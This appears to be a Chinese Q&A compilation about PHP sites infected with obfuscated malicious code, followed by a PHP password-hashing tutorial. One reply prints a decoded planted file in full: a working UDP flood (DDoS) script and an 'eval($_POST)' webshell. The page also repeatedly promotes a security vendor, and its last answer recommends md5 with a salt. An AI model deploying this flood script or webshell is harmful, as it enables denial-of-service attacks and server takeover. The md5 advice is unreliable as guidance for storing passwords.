文章大纲：

• 1、求解密如下PHP加密代码，被黑客入侵篡改了主页：
• 2、求教，网页PHP程序老是被加入如下机密代码，导致网站打不开，
• 3、asp网站被人入侵，留了这样一个php加密代码文件，求解决
• 4、帝国CMS网站被挂马，所有PHP文件均被加上eval(base64_decode代码，求高手分析。
• 5、php代码怎么加密更好，不能破解的那种
• 6、如何给php代码加密

求解密如下PHP加密代码，被黑客入侵篡改了主页：

这个是内容

不过  如果你使用的是虚拟主机 那么你可以找你供应商来协商

如果是虚拟主机的问题

这个代码这里不允许直接发的  只好截图给你了

求教，网页PHP程序老是被加入如下机密代码，导致网站打不开，

把eval换成echo就能看到解密后的代码了

解密后的代码，其实很简单的PHP加密而已，这个用来做黑帽的，至于你说的时间日期没改变，那个其实很简单，修改一下日期属性就OK了，估计你的站已经被留了后门，现在首要的任务是去除后门，然后修补漏洞，这才是真正治本的 ***

asp网站被人入侵，留了这样一个php加密代码文件，求解决

首先说下1楼的，你不经大脑就回答，简直就是占地方

楼主，我帮你解密出来了：

??php

$packets = 0;

$ip = $_GET['ip'];

$rand = $_GET['port'];

set_time_limit(0);

ignore_user_abort(FALSE);

$exec_time = $_GET['time'];

$time = time();

print "Flooded: $ip on port $rand brbr";

$max_time = $time+$exec_time;

for($i=0;$i65535;$i++){

$out .= "X";

}

while(1){

$packets++;

if(time() $max_time){

break;

}

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";

?

?php eval($_POST[ddos])?

?

解密过程：

decode.php

?php

ob_start();

echo (gzinflate(base64_decode('加密内容')));

$file = ob_get_clean();

file_put_contents("a.txt",$file);

?

1、之一次运行，会在decode.php同目录下生成一个a.txt，里面的内容就是解密出来的（但不一定是最终结果）

2、当a.txt里的代码还不是最初密文的源码时，再次把a.txt里的“加密内容”拷到decode.php替换掉原来的加密内容

循环1、2两步，直到a.txt解密出源码，显示的代码是php代码，如上

源码验证是否正确，只要你看得懂没解密前运行时网页上显示错误的信息，即可对比真实与否

帝国CMS网站被挂马，所有PHP文件均被加上eval(base64_decode代码，求高手分析。

网站被黑的因素分2中 一中是由于服务器空间商的安全 导致被牵连

一种是网站程序的安全自身的程序安全漏洞被黑被入侵被挂马。

有条件的话可以找专业做安全的去看看. 公司的话可以去Sine安全看看听朋友说不错。

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了

网站挂马是每个网站最头痛的问题，解决办法：1.在程序中很容易找到挂马的代码，直接删除，或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是更好的解决办法。更好的 *** 还是找专业做安全的来帮你解决掉

听朋友说 SineSafe 不错 你可以去看看。

清马+修补漏洞=彻底解决

所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种 *** 获得网站管理员账号，然后登陆网站后台，通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒

清马

1、找挂马的标签，比如有script language="javascript" src="网马地址"/script或iframe width=420 height=330 frameborder=0scrolling=auto src=网马地址/iframe，或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马，一般是 *** 挂马。

2、找到了恶意代码后，接下来就是清马，如果是网页被挂马，可以用手动清，也可以用批量清，网页清马比较简单，这里就不详细讲，现在着重讲一下SQL数据库清马，用这一句语句“update 表名 set 字段名=replace(字段名,'aaa','')”， 解释一下这一句子的意思：把字段名里的内容包含aaa的替换成空，这样子就可以一个表一个表的批量删除网马。

在你的网站程序或数据库没有备份情况下，可以实行以上两步骤进行清马，如果你的网站程序有备份的话，直接覆盖原来的文件即可。

修补漏洞（修补网站漏洞也就是做一下网站安全。）

1、修改网站后台的用户名和密码及后台的默认路径。

2、更改数据库名,如果是ACCESS数据库，那文件的扩展名更好不要用mdb，改成ASP的，文件名也可以多几个特殊符号。

3、接着检查一下网站有没有注入漏洞或跨站漏洞，如果有的话就相当打上防注入或防跨站补丁。

4、检查一下网站的上传文件，常见了有欺骗上传漏洞，就对相应的代码进行过滤。

5、尽可能不要暴露网站的后台地址，以免被社会工程学猜解出管理用户和密码。

6、写入一些防挂马代码，让框架代码等挂马无效。

7、禁用FSO权限也是一种比较绝的 *** 。

8、修改网站部分文件夹的读写权限。

9、如果你是自己的服务器，那就不仅要对你的网站程序做一下安全了，而且要对你的服务器做一下安全也是很有必要了！

网站被挂马是普遍存在现象然而也是每一个网站运营者的心腹之患。

您是否因为网站和服务器天天被入侵挂马等问题也曾有过想放弃的想法呢，您否也因为不太了解网站技术的问题而耽误了网站的运营，您是否也因为精心运营的网站反反复复被一些无聊的黑客入侵挂马感到徬彷且很无耐。有条件建议找专业做网站安全的sine安全来做安全维护。

php代码怎么加密更好，不能破解的那种

在使用PHP开发Web应用的中，很多的应用都会要求用户注册，而注册的时候就需要我们对用户的信息进行处理了，最常见的莫过于就是邮箱和密码了，本文意在讨论对密码的处理：也就是对密码的加密处理。

MD5

相信很多PHP开发者在更先接触PHP的时候，处理密码的首选加密函数可能就是MD5了，我当时就是这样的：

$password = md5($_POST["password"]);

上面这段代码是不是很熟悉？然而MD5的加密方式目前在PHP的江湖中貌似不太受欢迎了，因为它的加密算法实在是显得有点简单了，而且很多破解密码的站点都存放了很多经过MD5加密的密码字符串，所以这里我是非常不提倡还在单单使用MD5来加密用户的密码的。

SHA256 和 SHA512

其实跟前面的MD5同期的还有一个SHA1加密方式的，不过也是算法比较简单，所以这里就一笔带过吧。而这里即将要说到的SHA256 和 SHA512都是来自于SHA2家族的加密函数，看名字可能你就猜的出来了，这两个加密方式分别生成256和512比特长度的hash字串。

他们的使用 *** 如下：

?php

$password = hash("sha256", $password);

PHP内置了hash()函数，你只需要将加密方式传给hash()函数就好了。你可以直接指明sha256, sha512, md5, sha1等加密方式。

盐值

在加密的过程，我们还有一个非常常见的小伙伴：盐值。对，我们在加密的时候其实会给加密的字符串添加一个额外的字符串，以达到提高一定安全的目的：

?php

function generateHashWithSalt($password) {$intermediateSalt = md5(uniqid(rand(), true));$salt = substr($intermediateSalt, 0, 6);

return hash("sha256", $password . $salt);}

Bcrypt

如果让我来建议一种加密方式的话，Bcrypt可能是我给你推荐的更低要求了，因为我会强烈推荐你后面会说到的Hashing API，不过Bcrypt也不失为一种比较不错的加密方式了。

?php

function generateHash($password) {

if (defined("CRYPT_BLOWFISH") CRYPT_BLOWFISH) {$salt = '$2y$11$' . substr(md5(uniqid(rand(), true)), 0, 22);return crypt($password, $salt);

}

}

Bcrypt 其实就是Blowfish和crypt()函数的结合，我们这里通过CRYPT_BLOWFISH判断Blowfish是否可用，然后像上面一样生成一个盐值，不过这里需要注意的是，crypt()的盐值必须以$2a$或者$2y$开头，详细资料可以参考下面的链接：

更多资料可以看这里：

Hashing API

这里才是我们的重头戏，Password Hashing API是PHP 5.5之后才有的新特性，它主要是提供下面几个函数供我们使用：

password_hash() – 对密码加密.

password_verify() – 验证已经加密的密码，检验其hash字串是否一致.

password_needs_rehash() – 给密码重新加密.

password_get_info() – 返回加密算法的名称和一些相关信息.

虽然说crypt()函数在使用上已足够，但是password_hash()不仅可以使我们的代码更加简短，而且还在安全方面给了我们更好的保障，所以，现在PHP的官方都是推荐这种方式来加密用户的密码，很多流行的框架比如Laravel就是用的这种加密方式。

?php

$hash = password_hash($passwod, PASSWORD_DEFAULT);对，就是这么简单，一行代码，All done。

PASSWORD_DEFAULT目前使用的就是Bcrypt，所以在上面我会说推荐这个，不过因为Password Hashing API做得更好了，我必须郑重地想你推荐Password Hashing API。这里需要注意的是，如果你代码使用的都是PASSWORD_DEFAULT加密方式，那么在数据库的表中，password字段就得设置超过60个字符长度，你也可以使用PASSWORD_BCRYPT，这个时候，加密后字串总是60个字符长度。

这里使用password_hash()你完全可以不提供盐值(salt)和 消耗值 (cost)，你可以将后者理解为一种性能的消耗值，cost越大，加密算法越复杂，消耗的内存也就越大。当然，如果你需要指定对应的盐值和消耗值，你可以这样写：

?php

$options = [

'salt' = custom_function_for_salt(), //write your own code to generate a suitable salt'cost' = 12 // the default cost is 10

];

$hash = password_hash($password, PASSWORD_DEFAULT, $options);密码加密过后，我们需要对密码进行验证，以此来判断用户输入的密码是否正确：

?php

if (password_verify($password, $hash)) {

// Pass

}

else {

// Invalid

}

很简单的吧，直接使用password_verify就可以对我们之前加密过的字符串（存在数据库中）进行验证了。

然而，如果有时候我们需要更改我们的加密方式，如某一天我们突然想更换一下盐值或者提高一下消耗值，我们这时候就要使用到password_needs_rehash()函数了：

?php

if (password_needs_rehash($hash, PASSWORD_DEFAULT, ['cost' = 12])) {// cost change to 12

$hash = password_hash($password, PASSWORD_DEFAULT, ['cost' = 12]);// don't forget to store the new hash!

}

只有这样，PHP的Password Hashing API才会知道我们重现更换了加密方式，这样的主要目的就是为了后面的密码验证。

简单地说一下password_get_info()，这个函数一般可以看到下面三个信息：

algo – 算法实例

algoName – 算法名字

options – 加密时候的可选参数

所以，现在就开始用PHP 5.5吧，别再纠结低版本了。

Happy Hacking

如何给php代码加密

前台加密

后台接收到后

在和盐值拼接

在加密

存入数据库

我用md5举例

前台:md5(pwd);

//前台找一个js加密扩展就行

后台:

$salt

=

mt_rand(100000,999999);

//随机盐值

$pwd

=

md5($_GET('pwd').$salt);

//这样双重加密后入库了

登录验证时

前台也记得加密哦